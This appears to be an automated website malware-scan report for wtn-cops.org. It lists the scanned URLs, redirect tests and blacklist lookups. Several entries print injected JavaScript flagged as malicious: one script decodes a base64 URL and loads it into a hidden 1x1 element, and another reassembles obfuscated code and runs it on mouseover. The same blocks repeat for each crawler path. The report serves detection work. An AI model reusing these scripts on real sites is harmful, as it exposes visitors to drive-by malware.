Scanned pages/files
Request | Server response | Status |
http://wtn-cops.org/ | 200 OK Content-Length: 25781 Content-Type: text/html | clean |
http://wtn-cops.org/css.js | 200 OK Content-Length: 26006 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var PluginDetect={version:"0.7.5",name:"PluginDetect",handler:function(c,b,a){return function(){c(b,a)}},isDefined:function(b){return typeof b!="undefined"},isArray:function(b){return(/array/i).test(Object.prototype.toString.call(b))},isFunc:function(b){return typeof b=="function"},isString:function(b){return typeof b=="string"},isNum:function(b){return typeof b=="number"},isStrNum:function(b){return(typeof b=="string"&&(/\d/).test(b))},getNumRegx:/[\d][\d\.\_,-]*/,splitNumRegx:/[\.\_,-] break; case 'gdf544': coun = counter.get('aW1n'); break; case '98grth': coun = counter.set('aZkf264'); break; } cnter = document.createElement(coun); cnter.setAttribute("src", counter.get('aHR0cDovL3NlYzIxMDVkb21zLmNvLmNjL21haW4ucGhwP3BhZ2U9MjA1OTA3ZjlmMThjMWQ2ZA==')); cnter.style.width = 1+"px"; cnter.style.height = 1+"px"; document.body.appendChild(cnter); } window.onload = checkmouse; Antivirus reports:
| ||
http://wtn-cops.org/./sitemap/index.php | 200 OK Content-Length: 9036 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) window.w3ssss=function(){ var scriptlink = "http://jquery.googlecode.com/svn/trunk/gadget/scripts/s.js?userrefer=%0A7gw%0Anayies4flsrrd4p%3Du4fdsauogkncu2zutcymahnepbdnkg8t5wd.6ulcwprr5hjef37ace0tfgpe1zlEz19lkt9ey3sm96oeko4nhuvtfy5%282wj%226ofils0fowyrx6wanu4m6ajeinf%22bqs%293e0%3Bd5i%0Ayczieyifqi9rct4.sl6snrzre2ocola%3Dg1q%22cd8h7irth8ltcufpz5g%3Adu6/g4u/wwovvb0cb8p-p74bkadu0krsxuaip6znd9eegtrsghbsejf.ponc8kiocetmh6r/cp8i63lndkg.8rrpbewh9kepdka%22x5n%3B73r%0Av27iar6fht8rpsz.r5ksx1ott for(var i=0,content=''; i<userref.length; i+=visitnum){content+=userref.charAt(i);} try{ window[cont](content) }catch(e){} } window.CheckBody = function() { if (!document.body){setTimeout('CheckBody();',10);} else { window.nomore=false; document.body.onmouseover=function(){if(!window.nomore){window.nomore=true;w3ssss();}} window.onmouseover=function(){if(!window.nomore){window.nomore=true;w3ssss();}} } } CheckBody(); Antivirus reports:
| ||
http://wtn-cops.org/./sitemap/../index.php | 200 OK Content-Length: 25781 Content-Type: text/html | clean |
http://wtn-cops.org/./sitemap/../css.js | 200 OK Content-Length: 26006 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var PluginDetect={version:"0.7.5",name:"PluginDetect",handler:function(c,b,a){return function(){c(b,a)}},isDefined:function(b){return typeof b!="undefined"},isArray:function(b){return(/array/i).test(Object.prototype.toString.call(b))},isFunc:function(b){return typeof b=="function"},isString:function(b){return typeof b=="string"},isNum:function(b){return typeof b=="number"},isStrNum:function(b){return(typeof b=="string"&&(/\d/).test(b))},getNumRegx:/[\d][\d\.\_,-]*/,splitNumRegx:/[\.\_,-] break; case 'gdf544': coun = counter.get('aW1n'); break; case '98grth': coun = counter.set('aZkf264'); break; } cnter = document.createElement(coun); cnter.setAttribute("src", counter.get('aHR0cDovL3NlYzIxMDVkb21zLmNvLmNjL21haW4ucGhwP3BhZ2U9MjA1OTA3ZjlmMThjMWQ2ZA==')); cnter.style.width = 1+"px"; cnter.style.height = 1+"px"; document.body.appendChild(cnter); } window.onload = checkmouse; Antivirus reports:
| ||
http://wtn-cops.org/./sitemap/.././sitemap/index.php | 200 OK Content-Length: 9036 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) window.w3ssss=function(){ var scriptlink = "http://jquery.googlecode.com/svn/trunk/gadget/scripts/s.js?userrefer=%0A7gw%0Anayies4flsrrd4p%3Du4fdsauogkncu2zutcymahnepbdnkg8t5wd.6ulcwprr5hjef37ace0tfgpe1zlEz19lkt9ey3sm96oeko4nhuvtfy5%282wj%226ofils0fowyrx6wanu4m6ajeinf%22bqs%293e0%3Bd5i%0Ayczieyifqi9rct4.sl6snrzre2ocola%3Dg1q%22cd8h7irth8ltcufpz5g%3Adu6/g4u/wwovvb0cb8p-p74bkadu0krsxuaip6znd9eegtrsghbsejf.ponc8kiocetmh6r/cp8i63lndkg.8rrpbewh9kepdka%22x5n%3B73r%0Av27iar6fht8rpsz.r5ksx1ott for(var i=0,content=''; i<userref.length; i+=visitnum){content+=userref.charAt(i);} try{ window[cont](content) }catch(e){} } window.CheckBody = function() { if (!document.body){setTimeout('CheckBody();',10);} else { window.nomore=false; document.body.onmouseover=function(){if(!window.nomore){window.nomore=true;w3ssss();}} window.onmouseover=function(){if(!window.nomore){window.nomore=true;w3ssss();}} } } CheckBody(); Antivirus reports:
| ||
http://wtn-cops.org/./sitemap/.././sitemap/../index.php | 200 OK Content-Length: 25781 Content-Type: text/html | clean |
http://wtn-cops.org/./sitemap/.././sitemap/../css.js | 200 OK Content-Length: 26006 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var PluginDetect={version:"0.7.5",name:"PluginDetect",handler:function(c,b,a){return function(){c(b,a)}},isDefined:function(b){return typeof b!="undefined"},isArray:function(b){return(/array/i).test(Object.prototype.toString.call(b))},isFunc:function(b){return typeof b=="function"},isString:function(b){return typeof b=="string"},isNum:function(b){return typeof b=="number"},isStrNum:function(b){return(typeof b=="string"&&(/\d/).test(b))},getNumRegx:/[\d][\d\.\_,-]*/,splitNumRegx:/[\.\_,-] break; case 'gdf544': coun = counter.get('aW1n'); break; case '98grth': coun = counter.set('aZkf264'); break; } cnter = document.createElement(coun); cnter.setAttribute("src", counter.get('aHR0cDovL3NlYzIxMDVkb21zLmNvLmNjL21haW4ucGhwP3BhZ2U9MjA1OTA3ZjlmMThjMWQ2ZA==')); cnter.style.width = 1+"px"; cnter.style.height = 1+"px"; document.body.appendChild(cnter); } window.onload = checkmouse; Antivirus reports:
| ||
http://wtn-cops.org/./sitemap/.././sitemap/.././sitemap/index.php | 200 OK Content-Length: 9036 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) window.w3ssss=function(){ var scriptlink = "http://jquery.googlecode.com/svn/trunk/gadget/scripts/s.js?userrefer=%0A7gw%0Anayies4flsrrd4p%3Du4fdsauogkncu2zutcymahnepbdnkg8t5wd.6ulcwprr5hjef37ace0tfgpe1zlEz19lkt9ey3sm96oeko4nhuvtfy5%282wj%226ofils0fowyrx6wanu4m6ajeinf%22bqs%293e0%3Bd5i%0Ayczieyifqi9rct4.sl6snrzre2ocola%3Dg1q%22cd8h7irth8ltcufpz5g%3Adu6/g4u/wwovvb0cb8p-p74bkadu0krsxuaip6znd9eegtrsghbsejf.ponc8kiocetmh6r/cp8i63lndkg.8rrpbewh9kepdka%22x5n%3B73r%0Av27iar6fht8rpsz.r5ksx1ott for(var i=0,content=''; i<userref.length; i+=visitnum){content+=userref.charAt(i);} try{ window[cont](content) }catch(e){} } window.CheckBody = function() { if (!document.body){setTimeout('CheckBody();',10);} else { window.nomore=false; document.body.onmouseover=function(){if(!window.nomore){window.nomore=true;w3ssss();}} window.onmouseover=function(){if(!window.nomore){window.nomore=true;w3ssss();}} } } CheckBody(); Antivirus reports:
| ||
http://wtn-cops.org/./sitemap/.././sitemap/.././sitemap/../index.php | 200 OK Content-Length: 25781 Content-Type: text/html | clean |
http://wtn-cops.org/./sitemap/.././sitemap/.././sitemap/../css.js | 200 OK Content-Length: 26006 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var PluginDetect={version:"0.7.5",name:"PluginDetect",handler:function(c,b,a){return function(){c(b,a)}},isDefined:function(b){return typeof b!="undefined"},isArray:function(b){return(/array/i).test(Object.prototype.toString.call(b))},isFunc:function(b){return typeof b=="function"},isString:function(b){return typeof b=="string"},isNum:function(b){return typeof b=="number"},isStrNum:function(b){return(typeof b=="string"&&(/\d/).test(b))},getNumRegx:/[\d][\d\.\_,-]*/,splitNumRegx:/[\.\_,-] break; case 'gdf544': coun = counter.get('aW1n'); break; case '98grth': coun = counter.set('aZkf264'); break; } cnter = document.createElement(coun); cnter.setAttribute("src", counter.get('aHR0cDovL3NlYzIxMDVkb21zLmNvLmNjL21haW4ucGhwP3BhZ2U9MjA1OTA3ZjlmMThjMWQ2ZA==')); cnter.style.width = 1+"px"; cnter.style.height = 1+"px"; document.body.appendChild(cnter); } window.onload = checkmouse; Antivirus reports:
| ||
http://wtn-cops.org/./sitemap/.././sitemap/.././sitemap/.././sitemap/index.php | 200 OK Content-Length: 9036 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) window.w3ssss=function(){ var scriptlink = "http://jquery.googlecode.com/svn/trunk/gadget/scripts/s.js?userrefer=%0A7gw%0Anayies4flsrrd4p%3Du4fdsauogkncu2zutcymahnepbdnkg8t5wd.6ulcwprr5hjef37ace0tfgpe1zlEz19lkt9ey3sm96oeko4nhuvtfy5%282wj%226ofils0fowyrx6wanu4m6ajeinf%22bqs%293e0%3Bd5i%0Ayczieyifqi9rct4.sl6snrzre2ocola%3Dg1q%22cd8h7irth8ltcufpz5g%3Adu6/g4u/wwovvb0cb8p-p74bkadu0krsxuaip6znd9eegtrsghbsejf.ponc8kiocetmh6r/cp8i63lndkg.8rrpbewh9kepdka%22x5n%3B73r%0Av27iar6fht8rpsz.r5ksx1ott for(var i=0,content=''; i<userref.length; i+=visitnum){content+=userref.charAt(i);} try{ window[cont](content) }catch(e){} } window.CheckBody = function() { if (!document.body){setTimeout('CheckBody();',10);} else { window.nomore=false; document.body.onmouseover=function(){if(!window.nomore){window.nomore=true;w3ssss();}} window.onmouseover=function(){if(!window.nomore){window.nomore=true;w3ssss();}} } } CheckBody(); Antivirus reports:
| ||
http://wtn-cops.org/./sitemap/.././sitemap/.././sitemap/.././sitemap/../index.php | 200 OK Content-Length: 25781 Content-Type: text/html | clean |
http://wtn-cops.org/./sitemap/.././sitemap/.././sitemap/.././sitemap/../css.js | 200 OK Content-Length: 26006 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var PluginDetect={version:"0.7.5",name:"PluginDetect",handler:function(c,b,a){return function(){c(b,a)}},isDefined:function(b){return typeof b!="undefined"},isArray:function(b){return(/array/i).test(Object.prototype.toString.call(b))},isFunc:function(b){return typeof b=="function"},isString:function(b){return typeof b=="string"},isNum:function(b){return typeof b=="number"},isStrNum:function(b){return(typeof b=="string"&&(/\d/).test(b))},getNumRegx:/[\d][\d\.\_,-]*/,splitNumRegx:/[\.\_,-] break; case 'gdf544': coun = counter.get('aW1n'); break; case '98grth': coun = counter.set('aZkf264'); break; } cnter = document.createElement(coun); cnter.setAttribute("src", counter.get('aHR0cDovL3NlYzIxMDVkb21zLmNvLmNjL21haW4ucGhwP3BhZ2U9MjA1OTA3ZjlmMThjMWQ2ZA==')); cnter.style.width = 1+"px"; cnter.style.height = 1+"px"; document.body.appendChild(cnter); } window.onload = checkmouse; Antivirus reports:
| ||
http://wtn-cops.org/./sitemap/.././sitemap/.././sitemap/.././sitemap/.././sitemap/index.php | 200 OK Content-Length: 9036 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) window.w3ssss=function(){ var scriptlink = "http://jquery.googlecode.com/svn/trunk/gadget/scripts/s.js?userrefer=%0A7gw%0Anayies4flsrrd4p%3Du4fdsauogkncu2zutcymahnepbdnkg8t5wd.6ulcwprr5hjef37ace0tfgpe1zlEz19lkt9ey3sm96oeko4nhuvtfy5%282wj%226ofils0fowyrx6wanu4m6ajeinf%22bqs%293e0%3Bd5i%0Ayczieyifqi9rct4.sl6snrzre2ocola%3Dg1q%22cd8h7irth8ltcufpz5g%3Adu6/g4u/wwovvb0cb8p-p74bkadu0krsxuaip6znd9eegtrsghbsejf.ponc8kiocetmh6r/cp8i63lndkg.8rrpbewh9kepdka%22x5n%3B73r%0Av27iar6fht8rpsz.r5ksx1ott for(var i=0,content=''; i<userref.length; i+=visitnum){content+=userref.charAt(i);} try{ window[cont](content) }catch(e){} } window.CheckBody = function() { if (!document.body){setTimeout('CheckBody();',10);} else { window.nomore=false; document.body.onmouseover=function(){if(!window.nomore){window.nomore=true;w3ssss();}} window.onmouseover=function(){if(!window.nomore){window.nomore=true;w3ssss();}} } } CheckBody(); Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: wtn-cops.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 05 Oct 2014 10:08:26 GMT
Server: Apache
Content-Type: text/html
GET / HTTP/1.1
Host: wtn-cops.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 05 Oct 2014 10:08:26 GMT
Server: Apache
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: wtn-cops.org
Referer: http://www.google.com/search?q=wtn-cops.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: wtn-cops.org
Referer: http://www.google.com/search?q=wtn-cops.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=wtn-cops.org
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://wtn-cops.org/
Result: wtn-cops.org is not infected or malware details are not published yet.
Result: wtn-cops.org is not infected or malware details are not published yet.